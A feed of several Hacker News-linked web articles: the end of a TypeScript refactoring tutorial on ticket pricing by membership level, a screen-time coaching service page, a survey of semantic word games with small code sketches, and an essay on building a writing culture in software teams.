    I’m going to make a rudimentary example to demonstrate how we might refactor a function, without changing its behavior, in a way that will make it much easier to enhance in the future.

    Here we have a getTicketPrice function. It receives a Show as an argument. Members get a 15% discount on ticket prices, while non-members pay the full price. Our function looks like this:

    type Show = {
      name: string
      /**
       * The price in cents. Typically it's better to store money as an object, but
       * here we'll make the assumption we're working with US currency.
       */
      price: number
    }
    
    function getTicketPrice(show: Show, isMember: boolean) {
      return isMember ? show.price * 0.85 : show.price
    }

    The tests for a function like this are fairly straightforward. I’ll write them in a style that’s compatible with Vitest or Jest:

    describe('getTicketPrice', () => {
      const show: Show = {
        name: 'Test show',
        price: 1000,
      }
    
      it('should give members a 15% discount', () => {
        expect(getTicketPrice(show, true)).toEqual(850)
      })
    
      it('should give non-members the full price', () => {
        expect(getTicketPrice(show, false)).toEqual(1000)
      })
    })

    Running our tests shows that they’re working.

    Two passing tests

    Let’s say we learn that we now offer different levels of memberships. A member might be a basic member or a premium one. Members of premium status will get an even greater discount of 25%. What does this mean for our function?

    The first obvious thing we’ll need to refactor is the isMember boolean. Simply put, we won’t be able to represent three possible membership levels with a boolean. I haven’t come across a name for the refactoring we’ll do, but I think Boolean to Variant might be a good one. As we make this change, remember we’re trying to keep the same observable behavior.

    type Show = {
      name: string
      price: number
    }
    
    // We'll add a membership type and represent our two current states
    type Membership = 'member' | 'non-member'
    
    // We'll use that type instead of the boolean
    function getTicketPrice(show: Show, membership: Membership) {
      // We'll update our implementation to use our membership instead
      switch (membership) {
        case 'member':
          return show.price * 0.85
        case 'non-member':
          return show.price
      }
    }

    We’ll need to make a small change to our tests, but we’ll see that they continue to pass. An added benefit is we removed a flag argument in the process:

    describe('getTicketPrice', () => {
      const show: Show = {
        name: 'Test show',
        price: 1000,
      }
    
      it('should give members a 15% discount', () => {
        expect(getTicketPrice(show, 'member')).toEqual(850)
      })
    
      it('should give non-members the full price', () => {
        expect(getTicketPrice(show, 'non-member')).toEqual(1000)
      })
    })

    Our tests are still green with that change. I won’t share a picture; it’s exactly the same as before.

    That said, I think we’re at a place where we can add our new feature. Given the nature of this function, we can write the additional test first, then get it passing:

    it('should give premium members a 25% discount', () => {
      expect(getTicketPrice(show, 'premium')).toEqual(750)
    })

    Our test fails, so let’s get it passing. To do so, we’ll add a premium variant to Membership and account for it in our function:

    type Show = {
      name: string
      price: number
    }
    
    type Membership = 'member' | 'non-member' | 'premium'
    
    function getTicketPrice(show: Show, membership: Membership) {
      switch (membership) {
        case 'premium':
          return show.price * 0.75
        case 'member':
          return show.price * 0.85
        case 'non-member':
          return show.price
      }
    }

    And our tests are passing again.

    Three passing tests

    There might be more that we can do to this function. We could even argue a bit about the best way to do its implementation, but hopefully it gave you some insight into the process of changing code with safe refactorings.
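
    For instance, one optional safeguard worth adding (my suggestion, not part of the original article) is a TypeScript exhaustiveness check. With it, adding a fourth Membership variant without handling it becomes a compile error that points straight at this switch:

    type Show = {
      name: string
      price: number
    }

    type Membership = 'member' | 'non-member' | 'premium'

    function getTicketPrice(show: Show, membership: Membership) {
      switch (membership) {
        case 'premium':
          return show.price * 0.75
        case 'member':
          return show.price * 0.85
        case 'non-member':
          return show.price
        default: {
          // Unreachable today; becomes a compile error when a new variant appears.
          const unhandled: never = membership
          throw new Error(`Unhandled membership: ${unhandled}`)
        }
      }
    }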

    Final thoughts

    We need to reclaim “refactor” because this process of restructure, verify, add feature, verify is simply doing the job. I don’t want to have to use euphemisms to describe my work just so managers don’t freak out when changes are necessary. I think if refactors remain scary, then we actually make our work more dangerous for ourselves. Avoiding making changes only makes the code more complex and likely more error-prone as well.

    If we can embrace refactoring as a safe, atomic way to change code and recognize that it’s just a part of the day to day work, I think we can drop the stigma and start improving the codebases we work in.

    ]]>
    https://kyleshevlin.com/refactor-is-not-a-scary-word/ hacker-news-small-sites-43208663 Fri, 28 Feb 2025 18:17:01 GMT
    <![CDATA[Show HN: I built a 1:1 coaching service to reduce my screen time]]> thread link) | @roddylindsay
    February 28, 2025 | https://www.zabit.com/screen-time | archive.org

    screen time

    • A partner for your app usage

      Work with your coach to set achievable goals and get personal guidance

    • Integrated with your phone

      Set time limits and block apps automatically with Zabit App Tracking for iPhone

    • Stop ignoring your limits

      Your coach is notified every time you exceed your limit, increasing adherence through accountability

    Finally, swap the scroll for a positive habit

    Fitness

    • Work out more often
    • Walk 10,000 steps every day

    Lifestyle

    • Read more books
    • Meditate every day

    Hobbies

    • Learn a new language
    • Cook ambitious meals

    Health

    • Get to bed earlier
    • Cut down on snacking

    Parenting

    • Work on a hobby together every week
    • More screen-free time with the kids

    Friends & Family

    • Call your loved ones
    • Spend time with friends

    Meet our Coaches

    Zabit coaches are psychologists, wellness professionals, and advanced clinical psychology students.

    Mica

    Nutritionist and wellness expert with 5 years of experience helping clients with lifestyle changes.

    Nutrition, Fitness, Screen Time

    Clara

    Fourth year clinical psychology student, invested in helping clients build healthy habits.

    Health, Organization, Nutrition

    Rosario

    Fourth year clinical psychology student, loves helping others achieve their goals!

    Sleep, Lifestyle, Substances

    Q: Who is Zabit for?

    A: Zabit is for people who just need a bit of accountability for everyday habits.

    How Zabit coaching compares to therapy, life coaching, and personal training on personalized 1:1 support, daily reminders, daily accountability, app-based tracking, and cost:

                       Therapy         Life Coaching   Personal Training   Zabit Coaching
    Best for...        Mental Health   Life goals      Workouts            Everyday Habits
    Cost               $100+/week      $100+/week      $75+/week           $8.99/week

    ]]>
    https://www.zabit.com/screen-time hacker-news-small-sites-43208445 Fri, 28 Feb 2025 17:54:40 GMT
    <![CDATA[Show HN: Semantic Games – Word games based on meaning instead of spelling]]> thread link) | @michaeld123
    February 28, 2025 | https://www.inotherwords.app/semantic-games/ | archive.org

    Put away your Scrabble tiles. Explore connections, find pathways, and recognize patterns across meaning instead of spelling. A sub-genre of word puzzles exists where semantic relationships take center stage. Unlike traditional word games focused on letter arrangements, these challenges invite players to navigate networks of meaning that give language its richness. These idea-linking puzzles harness how concepts connect through chains of association.


    Synonym Chains

    Historical

    Synonym chains represent the earliest formal exploration of semantic networks in game form. Popularized by Dmitri Borgmann in his 1967 book "Beyond Language," they demonstrate that seemingly opposite words can connect through carefully constructed synonym chains. Borgmann's famous example transformed "black" into "white" through a sequence of small semantic shifts.

    These puzzles reveal meaning's gradient nature and identify key semantic pivot points. In Borgmann's examples, critical junctures occur when "concealed" (negative) connects to "snug" (positive) and when "insolent" (negative) links to "proud" (positive). This led Borgmann to conclude that "any word whatsoever may be converted into its opposite" through such chains.

    In 1987, computer scientist Ron Hardin at Bell Telephone Laboratories pioneered computational approaches using The New Collins Thesaurus. His work generated thousands of examples, demonstrating how virtually any word could transform into its opposite through 4-7 synonym steps.


    Only Connect

    A British television quiz show hosted by Victoria Coren Mitchell that has developed a cult following for its exceedingly challenging puzzles. Named after an E.M. Forster quote imploring readers to "only connect," the show tests teams on finding relationships between seemingly unrelated clues.

    Its most famous round, the "Connecting Wall," directly inspired the NYT's Connections game. Teams face 16 clues that must be sorted into 4 groups of 4 with a common link—with just 2½ minutes to solve it. The connections are notoriously obscure, from literary references to wordplay (like "words that can precede 'man'"). Other rounds include finding sequences and deciphering phrases with vowels removed. Often described as "the hardest quiz on TV," Only Connect celebrates lateral thinking and the joy of discovering hidden patterns.


    Connections

    A daily word categorization game published by The New York Times. From a grid of 16 words, players must sort them into four groups of four words sharing a hidden connection. The challenge lies in figuring out what those connections are—they might be straightforward themes like "dog breeds" or tricky wordplay like "words that can precede 'ball'".

    Each puzzle includes one easy category (color-coded yellow), two medium categories (green and blue), and one tricky category (purple). Players get four chances to make mistakes before the game ends. Connections became an instant hit after its 2023 release, quickly becoming the NYT's second-most popular game after Wordle.

    Two other notable 4×4 grid games exist. Red Herring (2014) predated Connections with a twist—players sort words into three categories while avoiding four unrelated "red herring" distractors. PuzzGrid (2018), inspired by Only Connect, offers thousands of user-contributed puzzles with similar mechanics but greater community involvement.


    Codenames

    A competitive team-based party game where "spymasters" provide one-word clues that must connect multiple target words while avoiding opponents' words. The game transforms semantic associations into strategic competition, challenging players to compress multiple concepts into a single, precise clue.

    Codenames stands out by turning word association into a social experience—where communication precision and shared cultural context become crucial gameplay elements. The core challenge lies in finding conceptual bridges that connect several words at once while avoiding misleading teammates toward opponents' words or the game-ending "assassin" word.

    The game's genius lies in exploring communication ambiguity. Every clue represents a delicate balance between breadth (covering multiple words) and precision (avoiding unintended associations). This tension creates memorable moments of triumph when teammates instantly understand a clever connection, or comedy when a seemingly clear clue is wildly misinterpreted.


    Decrypto

    A spy-themed team game where players communicate three-digit codes to teammates using semantic clues. Each team has four fixed keywords (numbered 1-4) visible only to them. When an "Encryptor" draws a code like "3-1-4," they must create clues for those positions without revealing the actual keywords.

    The game creates tension between clarity and secrecy: obvious clues help your team decode messages but reveal your keywords to opponents, while obscure clues prevent interception but risk miscommunication. Teams track all previous clues on notepads, gradually mapping their opponents' keywords while depleting their own semantic connections.

    As rounds progress, players exhaust obvious associations and must explore creative semantic territory. Meanwhile, opponents gather enough evidence to intercept poorly disguised codes. Success depends on balancing clarity with ambiguity while working within increasingly constrained semantic options.


    Taboo

    A party board game published by Hasbro in 1989 where players describe a target word without using certain "taboo" words listed on the card. Players must find alternative paths to convey concepts when obvious descriptive routes are blocked.

    Unlike connection-focused semantic games, Taboo emphasizes what players cannot say. This inverts typical word association by requiring lexical avoidance rather than bridge-building, testing players' linguistic flexibility under time pressure. When primary descriptive paths are blocked, players must access alternative expressions to communicate effectively.

    Gameplay creates natural humor through these constraints. Cultural knowledge and shared references become valuable tools, as effective clues often depend on the specific group's common experiences.


    Semantle

    A semantic word-guessing game released in 2022, when Wordle was a viral phenomenon. Semantle introduced semantic distance as a counterpoint to Wordle's letter-based feedback. It used "vectors" from Google's Word2Vec project—strings of numbers mapping words in multidimensional space. Before ChatGPT's launch, the idea that a computer could evaluate the similarity between any two words still felt somewhat mystical.

    The game earned the nickname "the Dark Souls of Wordle" for its difficulty. After each guess, players receive a similarity score (0-100) showing how semantically close their word is to the target. Word2Vec's limitations define the game—its neural network embeddings poorly classify words with multiple meanings and reveal connections that don't match human intuition, often circling players around the target word. With around 200,000 daily players at its peak, Semantle attracted an audience who endured navigating these beguiling word relationships.
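
    Under the hood, scores like Semantle's are typically the cosine similarity between two embedding vectors, rescaled to a 0-100 range. A minimal sketch in TypeScript (the 3-dimensional vectors are toy values for illustration; real Word2Vec embeddings have hundreds of dimensions):

    // Cosine similarity: dot(a, b) / (|a| * |b|), ranging from -1 to 1.
    function cosineSimilarity(a: number[], b: number[]): number {
      let dot = 0
      let normA = 0
      let normB = 0
      for (let i = 0; i < a.length; i++) {
        dot += a[i] * b[i]
        normA += a[i] * a[i]
        normB += b[i] * b[i]
      }
      return dot / (Math.sqrt(normA) * Math.sqrt(normB))
    }

    // Toy embeddings -- a real game would load these from a trained model.
    const target = [0.9, 0.1, 0.3]
    const guess = [0.8, 0.2, 0.4]

    // Semantle-style score: rescale similarity into roughly 0-100.
    console.log(Math.round(cosineSimilarity(target, guess) * 100))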

    Semantle inspired several variations that attempted to remedy its core frustrations. Contexto, created by Brazilian developer Nildo Junior, gained popularity in Brazil in late 2022 with its more intuitive interface. Another variant, Pimantle, uses a 2D visualization that plots guesses relative to the target word, creating a spatial map that addresses Semantle's notorious 'blind orbiting' problem.


    Linxicon

    A daily word-chain game where players connect two words by building a network of related terms. Imagine a start word in the bottom-left corner and an end word in the top-right corner of a blank canvas. Your challenge: add intermediate words that form semantic bridges between them, creating a continuous chain from start to finish.

    When you add a word, Linxicon uses a Sentence-BERT model to automatically connect it with any related words already on the board if their similarity exceeds 38%. You win when a complete chain forms between the start and end words. What makes Linxicon special is its visual network-building approach—you literally see the semantic web grow with each addition, and there's no single correct solution.

    Notably, the game does not always link "will" to "inheritance," perhaps because it only considers the sense of intent or desire.


    In Other Words

    A daily puzzle where players find chains between seemingly unrelated words, like connecting "sugar" to "peace" through "sweet" and "harmony". The game combines embedding vectors with weighted graph traversal to model nuanced relationships across a vast network of 1.1M words with 60M connections.

    In Other Words transforms word association into an elegant daily challenge. Each day presents two distant words, challenging players to build a bridge between them using semantic stepping stones. The game's core insight: virtually any two English words can connect through related meanings in seven steps or fewer.

    Beyond recognizing connections, the game rewards strategic thinking about which words serve as effective bridges. Skilled players identify "conceptual hubs" that efficiently connect disparate semantic territories. The most satisfying moments come from discovering surprising associations that elegantly link seemingly unrelated concepts.
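
    To make the chain-finding idea concrete, here is a toy sketch (my illustration, not the game's actual engine): breadth-first search over a tiny hand-built association graph recovers the sugar-to-peace chain above. Real games traverse millions of weighted edges, but the traversal idea is the same:

    // A tiny word-association graph; real games use millions of weighted edges.
    const graph: Record<string, string[]> = {
      sugar: ['sweet'],
      sweet: ['sugar', 'harmony'],
      harmony: ['sweet', 'peace'],
      peace: ['harmony'],
    }

    // Breadth-first search returns the shortest association chain, if any.
    function findChain(start: string, end: string): string[] | null {
      const queue: string[][] = [[start]]
      const seen = new Set<string>([start])
      while (queue.length > 0) {
        const path = queue.shift()!
        const word = path[path.length - 1]
        if (word === end) return path
        for (const next of graph[word] ?? []) {
          if (!seen.has(next)) {
            seen.add(next)
            queue.push([...path, next])
          }
        }
      }
      return null
    }

    console.log(findChain('sugar', 'peace')) // ['sugar', 'sweet', 'harmony', 'peace']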


    OtherWordly

    In development

    A space-themed arcade game that reimagines word puzzles as physical challenges. Players launch words through mesmerizing fields of geometric swarms, transforming traditional word matching into spatial gameplay while navigating obstacle courses and deciphering partially hidden targets like "v**il*a".

    OtherWordly merges semantic play with arcade action, creating a unique hybrid engaging both linguistic and spatial reasoning. Players navigate vibrant cosmic environments where words become physical objects to launch, guide, and manipulate.

    What distinguishes OtherWordly is its real-time difficulty adjustment that matches each player's skill across both word puzzles and arcade challenges, ensuring a personalized experience regardless of vocabulary or gaming prowess.


    Word Golf

    A browser-based game where you navigate from one word to another through a chain of semantically related words—like a round of golf played with concepts. The game presents two words (the tee and the hole), and your task is to find a path between them in as few steps as possible.

    At each step, Word Golf suggests possible "next hops" based on semantic associations powered by the GloVe model. For example, connecting "pilot" to "pineapple" might require a path like "pilot → ship → container → refrigerator → snack → canned → pineapple". Unlike classic word ladders that change one letter at a time, Word Golf lets you jump between related concepts, creating a game that feels like exploring a vast semantic map.


    Human Brain Cloud

    A project combining game elements with data collection, promoted as a "massively multiplayer word association game." Players see a word, type their first association, and collectively build a crowdsourced semantic network of concepts.

    Starting with "volcano" and growing to millions of connections, it showed participants how their associations compared to others. This feedback made contributing engaging, as people discovered where their thinking aligned with the crowd.

    The project visualized these connections through a bold, animated radial tree with thick strokes and floppy motion. It revealed patterns in word association, with "sex," "me," and "money" emerging as the most frequent responses, creating a distinctive map of semantic relationships in our collective understanding of language.


    Semantris

    An AI-powered word association game released by Google to showcase their semantic technology. Players type a word they associate with a target word, and the AI evaluates how closely connected these concepts are in semantic space.

    The game featured two modes: a block-clearing puzzle and a list-reordering challenge. It was powered by Google's Universal Sentence Encoder, which could recognize that words like "shell" and "turtle" were semantically related—at the time, an early demonstration of AI word understanding.

    Semantris differs from most semantic games by having players attempt to match the AI's expected connections rather than explore their own associations. This created an intriguing dynamic where players needed to think not about their own word associations, but what the machine might consider most relevant.


    Advancing semantic games

    We hope this will help inspire more semantic games. Meanwhile, if you know of a related semantic game that should be in this collection, let us know.

    ]]>
    https://www.inotherwords.app/semantic-games/ hacker-news-small-sites-43208227 Fri, 28 Feb 2025 17:36:19 GMT
    <![CDATA[Becoming a software A-Team via writing culture]]> thread link) | @ingve
    February 28, 2025 | https://www.evalapply.org/posts/writing-practices-to-10x-engineering/index.html | archive.org

    Becoming a software A-Team via writing culture

    Strong writing culture transforms merely competent software teams into elite ones: those proverbial 10x product builders. Although creating a high-leverage writing culture requires mindful effort, it is not rocket science, and one can start small. So... why, when, and how to do it? Personal opinions ahead. Take what is useful, discard the rest.



    "Writing is nature's way of telling you how sloppy your thinking is."

    — Richard Guindon

    • Intelligently crafted writing culture, though no silver bullet, is the only way to reliably leverage ourselves across space and time 1. Far beyond our own heads, and far into the future 2.
    • The closer one looks, the more one will notice elite performers in one's peer group. The proverbial 2x, 5x, 10x teams. Maybe even better. Invariably, they rely on strong writing culture to perform at the high level they do.
    • To successfully use writing for leverage; first, clean house. Then, start small. Think concurrency. Help one critical and busy person free up 10% of their work week.

    "Give me a fulcrum, and I shall move the world."

    — Archimedes of Syracuse

    All leverage is about finding or creating some source of asymmetric advantage. The greater the leverage, the greater the advantage, and the lower the energy expended to make things happen.

    Writing is Lever.

    Product is Fulcrum.

    Team is Force.

    Writing Product Team is A-Team.

    Word.

    "I love it when a plan comes together" - The A-Team

    A-teams write to kill complexity

    Complexity is to software what mass is to a rocket; the hard limiting factor of net-positive growth in any dimension one chooses to measure (shipping velocity, headcount, revenue, cash flow, account expansion; anything).

    David-sized product organisations succeed against Goliath-sized ones because they keep accidental complexity at bay 3. Such competitive advantage invariably flows from strong writing culture created by the Davids for their needs.

    Yet, teams of A players routinely crash and burn like "F"-Teams.

    They habitually accumulate unchecked masses of software debt, and fail to escape the terrible gravity well of accidental complexity.

    "I must not complect.
    Complexity is the mind-killer.
    Complexity is the little-death that brings obliteration.
    I will face complexity and I will permit it to pass over me and through me.
    And when it has gone past, I will turn the inner eye to see its path.
    Where the complexity has gone, there will be nothing.
    Only I will remain."

    — Litany Against Complexity

    A-teams write to compound value

    They use writing to generate overlapping compounding benefits:

    • conserve personal and collective attention
    • power creativity
    • grow intellectual capital
    • maintain clear situational awareness
    • run high-trust workplaces, and
    • make high-quality decisions.

    Because they know that software is people's thoughts on repeat, and that complexity is the negative-compounding mind-killer.

    Yet most product teams do not invest in writing culture.

    The result?

    Their people toil on hamster wheels of endless forgetting and rework. Value creation craters. Stock dilutes relentlessly. Their true burn rate measures not in cash, but in minds wasted and bodies spent.

    Sad, but not fated.

    A-teams get lucky more, by writing pervasively

    Privately cultivated writing culture runs dark and deep, but emits plenty of heat and light visible to even the most casual of observers.

    A strong culture of writing has the (good) habit of pervading all aspects of an organisation. Everything from their marketing copy, tweets, blogs, customer support interactions, documentation, mass mailers etc. reflects their deliberately curated writing culture.

    As a proxy measure 4: a company blog that is both tasteful and routinely makes the HackerNews front page is no accident. Fortune favours a power law curve. Sure, it randomly rewards prolific TikTok brainrot because there is sometimes a quality to quantity ("Even a broken clock is right twice a day." etc. etc.), but fortune rewards the prolific with taste and quality a lot more, and a lot more reliably.

    Individuals play the game, but teams beat the odds.

    — The US Navy SEALs

    A-teams master common-sense writing

    The good news? Our kind of writing is NOT rocket science.

    It is about:

    • simple common sense writing (no literature major necessary),
    • of, by, and for the product team, empowered by
    • systematic use of information tools (be it grep, wikis, or LLMs),
    • privately within the safety of one's team,
    • such that the whole team is significantly better off,
    • even if "team" is just you, to begin with.

    Good writing is the single most undervalued talent a startup can have.

    — "How we write", Griffin (a UK banking-as-service company).

    That page is just… chef-kiss-emoji. 5

    nb. I have artificially separated out categories to illustrate many different contexts in which writing is useful. This does not mean "Vomit needless words." 6.

    Quite the opposite… I write to systematically re-use a given unit of writing in multiple contexts, with little or no tweaking. For example:

    • how/why I write high quality commit messages (below), and
    • how/why I write teaching material such that I can use the same text to deliver live demos and publish as blog posts and as slides.

    To make

    Writing as part of the source of the artifact (code or design file).

    • Naming things (functions, APIs, domain entities)
    • Documentation strings
    • In-line comments
    • Metadata etc…

    Example: outline an API as working code, with mock implementations so that we can peer-review and evolve the meaning of our code, without getting lost in implementation details. The purpose of that commit was to help me think about, and get feedback on, the shape of an HTTP API. (Told ya. It ain't rocket science.)
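
    As a hypothetical illustration of the same idea (the linked commit is the real example; this sketch is mine, in TypeScript), an API outlined as working code with mock implementations might look like:

    /** A single entry in a team knowledge base. */
    type Note = {
      id: string
      title: string
      body: string
    }

    /**
     * The shape of the notes HTTP API. The doc comments carry design intent,
     * so review can focus on the interface rather than implementation details.
     */
    interface NotesApi {
      /** GET /notes/:id -- fetch one note, or null if it does not exist. */
      getNote(id: string): Promise<Note | null>
      /** POST /notes -- create a note and return it with a server-assigned id. */
      createNote(title: string, body: string): Promise<Note>
    }

    // Mock implementation: just enough to compile, run, and discuss.
    const mockNotesApi: NotesApi = {
      async getNote(id) {
        return { id, title: 'stub', body: 'stub' }
      },
      async createNote(title, body) {
        return { id: 'note-1', title, body }
      },
    }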

    To ship

    Writing that is adjacent to the artifact being produced. High quality commit messages, written code reviews, development-time notes etc…

    Example: Habitually writing model git commit messages is table stakes as far as I'm concerned, because I profit from the effort multiple times.

    • While making, writing the commit text forces my brain to switch from "execution" mode to "reflective" mode, to debug my thinking about what I just did. Subtle design errors and subtler bugs surface in this process often enough to keep me humble!
    • In code review, colleagues are rarely blocked on me to understand work-in-progress.
    • At feature shipping, they yield release notes, feature documentation, executive summaries… stuff that helps other people perform better and look good to their stakeholders, whether executive talking to board, customer success helping a new feature roll out succeed, sales to build factually accurate non-B.S. pitches etc…
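
    To make this concrete, here is what such a message might look like. It is a made-up example of the style, not a commit from any real project:

    auth: return 401 instead of 500 for expired tokens

    Why: clients treated the 500 as a server outage and retried endlessly,
    hiding the real problem (the user just needs to sign in again).

    What: token verification now distinguishes "expired" from "malformed"
    and maps the former to 401 with a machine-readable error code.

    Context: considered refreshing tokens server-side instead, but that
    belongs to the separate session-renewal work.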

    Context captured smartly on-the-fly folds into an assortment of trustworthy (with provenance) facts and explanations:

    Material for peers and colleagues that helps them reliably communicate with each other, the board / investors / customers / other outside stakeholders.

    • Executive briefings
    • Release notes etc.

    Product know-how that is essential to future decision-making about implementation details.

    Instruction material

    • Setup and usage guides (e.g. in READMEs)
    • Demos and/or instructions for demos,
    • Tutorials, onboarding programs, blog posts
    • e.g. The tutorial content and the README of clojure-by-example.

    Raw "research notes" and stream-of-conscious-y brain-dumps.

    • Create psychological safety by having a place where everybody is allowed to be wrong, drop half-assed ideas, add secondary context / things they explored and learned about while working on features.
    • Commit this context straight into the source to keep all new context visible through code review, or dump it in a wiki (but please cross-link the page to the project's README and mention changes in code review.)

    To evolve

    All shareable content as well as original sources further inform product requirement documents, project plans, and product strategy.

    • Improve and plan better via context-rich bug reports, post-mortems, and critiques.
    • Encourage critical thinking through rationales, concept notes, architecture diagrams, and specifications.
    • Help individuals grow by institutionalising knowledge in checklists and runbooks that help seniors rapidly onboard, mentor, and coach juniors into independent, skilled staff members.

    To de-risk

    Teams with a strong writing culture automatically de-risk themselves. They can go as far as to become a collection of buddy teams and individual contributors, cooperating with each other as needed. A lot more like specialty surgical teams than generic marching bands.

    Strategically: by cultivating a strong design culture.

    Tactically: by cultivating deep observability.

    • My favourite example again; model commit messages. Because I habitually make atomic commits and write model commit messages, colleagues have granular enough information about feature history to independently audit, debug, fact-find… for the whole life of the software. Such a history is very useful while making, but is rarely needed post-shipping. However it is needed inevitably, and when the need arises, the stakes are invariably high. Being able to inspect manually as well as trivially automate scripts using git bisect run (sketched below) becomes a superpower.
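
    For the unfamiliar: git bisect binary-searches commit history for the change that broke something, and git bisect run automates each probe with any command that exits non-zero on failure. A hypothetical session (the tag and script names are made up):

    git bisect start
    git bisect bad HEAD            # the current state is broken
    git bisect good v1.4.0         # hypothetical last-known-good tag
    git bisect run ./run-tests.sh  # hypothetical test script
    git bisect reset               # done: return to the original branch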

    To show up

    Please, let’s make visible the impact of the invisible work we do. Besides, why give up even small chances to look great to outside observers by being able to magically produce good answers fast? Not infrequently, by literally dumping a feature’s git log (or one’s running notes) into a document and cleaning it up.

    Please read Julia Evans’s post Get your work recognized: write a brag document. Guess what. You can’t do this unless you have a writing habit — scribble down "TIL"s and "A-ha"s and tiny wins. All these roll up into big impact. But we ourselves remain unaware because we often don’t have a tangible feedback loop showing that we are having an impact.

    To LLM harder

    For the LLM enjoyers out there, need I even suggest the compounding value of having a (consistently high-quality) input context to (re)feed into your LLM-assisted product development?

    What might be two hours of mostly manual collation and rewording of a raw dump could become a twenty-ish minute job of mostly intelligent review and copy-editing of LLM-produced content.

    Utility is contextual 7. Use the examples as a box of tools and craft something suited to the orientation, mandate, and goals of the workplace / team / self.

    Collaboration-oriented writing is the name of the game. I am convinced it has directly made me a better colleague, made "us" better together, and bettered the professional lives of others. Some of my best days have been people telling me, years after the fact, how much they benefited from stuff my like-minded colleagues and I wrote down and made useful "back then". My colleagues report similar experiences.

    There are no silver bullets

    Writing is unnatural, especially for teams. Heard of Bezos? Well, even someone with his smarts, charisma, and sweeping authority over his company had to work to make it work, because…

    It is a conscious choice

    We have to culture ourselves into pervasive, thoughtful, effective product development writing. As individuals. As teams. As whole org charts. LLMs may make writing life easier, but only we can do the work to make it work.

    It is not a one off activity

    Our kind of writing remains useful only through repeat use and progressive revision throughout the life of a software product. It needs leadership and community contribution to update, curate, improve, teach, use. Because bureaucratic ossification is always around the corner.

    It requires widespread buy-in

    One can't force it. Doing so will reliably cause more damage than good, by violently convincing people that it sucks, because the experience of it will in fact suck for everyone involved. If you find yourself in a leadership position in a writing-averse culture, boy do you have your work cut out. How will you save your people from the septic floodwaters of Meeting Overflow?

    It is not a mechanical template

    For example, if you try to copy Bezos and some imagined "Amazon Way", you will at best create a poor facsimile, which will only degrade over time. Just like those who tried and failed (and still do) to recreate the Toyota Way. Many are seduced by the allure of their Zen-like philosophy, lofty principles, and relentless success. Few notice how deep their writing practice goes, and how central it is to the ongoing success of their Way. So draw inspiration by all means, but work intelligently with your own context.

    It will reveal -your- nature and values

    If you fear that you might create a nightmare bureaucracy of soul-sucking process documentation and inter-personnel file redirection, you may need to stop right now and do some heavy soul-searching.

    Maybe some more great points that elude my mind. But you catch the drift, yes? Ain't no silver bullet.

    Before beginning, ensure the kitchen and the toilets are clean

    10x of zero is zero. 10x of "we suck" is "we dead".

    Writing practice creates leverage only if one's house is in order; viz. the team knows how to prioritise and how to reliably ship working software. The point of 10x-ing is to radically leverage competence, without diluting radically. As any seasoned businessperson will attest, dilution is relentless, and is a steep price to pay for a stitch in time.

    "Dilution is relentless."

    — Startup founder wisdom after their first Series B.

    Decide whether it's for you and your team

    IMO, teams and leaders fitting the following profile are well-positioned to evaluate and adopt "writing as a 10-xing strategy" 8:

    • The team is small and lean, whether independent, or lurking somewhere in the shadows of a world-spanning mega-corp. And you all aspire to do more with less, without burning out.
    • Your team builds and sells software products. Software service teams who trade time for money cannot hope to 10x in equity terms. They can, however, greatly improve overall profitability.
    • Your house is in order. You are so busy shipping, you just can't spare anyone to intelligently culture writing systems that will unlock the next level of elite performance.
    • You are willing to recruit a partner in crime. You, and at least one person you all trust, know that writing practices deployed strategically are key to punching way above collective body weight, without ballooning in size.
    • You have a discretionary budget to start small today. You must hire an out-of-band coach, or someone from another team, or your own mentor to drive this change. If you want to DIY, spend money to clear your brain and calendar… hire an executive assistant, or get a competent person on loan from another team, whom you can delegate time-consuming busy work to. Your brain can't be swamped and strategic (creative / observant) at the same time.

    Make no mistake, learning to create/deploy/adapt writing culture is a process of progressive team transformation. It is a long game that needs belief and buy-in. Nobody can change your beliefs about the value of good writing culture. Only you can do that. 9

    Reason like we do for concurrency problems

    Marginally taking pressure off a contended main thread can remarkably improve the throughput of a whole system.

    Individuals are single-process doers. Teams are concurrent systems. Achieving lock-free coordination is a winning play. Good writing culture delivers that capability.

    Choose a small goal…

    A reasonable person may choose a reasonable success criterion, such as "Achieve a 10% notional 'gain of leverage' of one critical person in a team of ten, such that all ten win.".

    "Gain of leverage" shows up as less polling/waiting, more proactive unblocking, less rework, higher value work product, higher quality thinking, more autonomy and improved collaboration, and uplifting experiences of real productivity.

    Pick one in-demand person in one in-demand team.

    Re-organize to inhabit "The Zone"

    Make it so that getting into The Zone, and staying there, becomes standard, especially for you as a leader.

    Learn from the best

    I am sure my list is not comprehensive. There are more tools and ideas and techniques out there. Search, adopt, and adapt! No need to re-invent the wheel.

    Here are some resources, in no particular order, to get the brain-juices flowing:

    External peer recognition may be one of the most validating measures of all. You know your team is winning when even the skeptics and the rivals soften up and ask "How can we do what you're doing?!".

    Yet, several internal measures are perhaps more personally valuable, and worth prioritising over outside admiration.

    Your leadership potential is fully realised

    Because good writing culture ended denial-of-mind attacks. The more senior you are, the more risk you bear for producing outcomes. Once upon a time your mind could barely keep up with endless interruptions and streams of consciousness arriving at you from chat channels, door knocks, and shoulder taps. Seniority rarely brought satisfaction commensurate with the weight of leadership.

    Now you spend most of your time coaching, mentoring, and writing exemplary code. Now you rarely have to ask anyone for a status update, you can query a system for it. You routinely have well informed senior-level conversations with the right people, all literally on the same page.

    The sense of progress is real

    Because good writing culture ended rework. Forgetting used to be endemic. The same problems repeated with more joining the fray. Every day was groundhog day.

    Now, you are still busy, but with real work, not busy work. You still wake up at 3AM worried about something, but that is the highest value thing. Your mind and body are sweating almost exclusively because of the difficult job of making, operating, selling, scaling your product.

    Confidence of business continuity is high

    Because good writing culture ended anxiety. Once upon a time, nobody really remembered why anything was done. Bus-factor risk was high and rising. Velocity suffered when different people kept asking the same kind of questions again and again, pulling attention away from critical-path tasks. Go-to-market failures seemed always around the corner. Stakeholder confidence in development was low, because it was an incomprehensible magical black box to them.

    Now decision making is no longer psychologically fraught. Now, you and your team have a shared, sufficiently coherent, organisation-wide picture, from daily priorities to long term objectives. Everybody has confidence that when the unexpected happens, as it will, they have the strategic context, tactical information, and systematic situational awareness to rise to the challenge and thrive through it.

    Everyone's default work mode becomes "Deep Work"

    Because good writing culture ended meeting culture. No more nebulous "all talk, no do" meetings, no more frequent sync-ups that could be async wiki page updates, no more constant barrage of chat DMs and at-mentions.

    Now when you see two or more people in a huddle or a live chat, it is them producing tangible value; pair programming, brainstorming, teaching and learning, reviewing and reflecting, deciding significant things, fixing outages, solving real emergencies.

    Job satisfaction is high

    Because with good writing culture people help people become Better, including their own future selves, and future colleagues they will never meet.

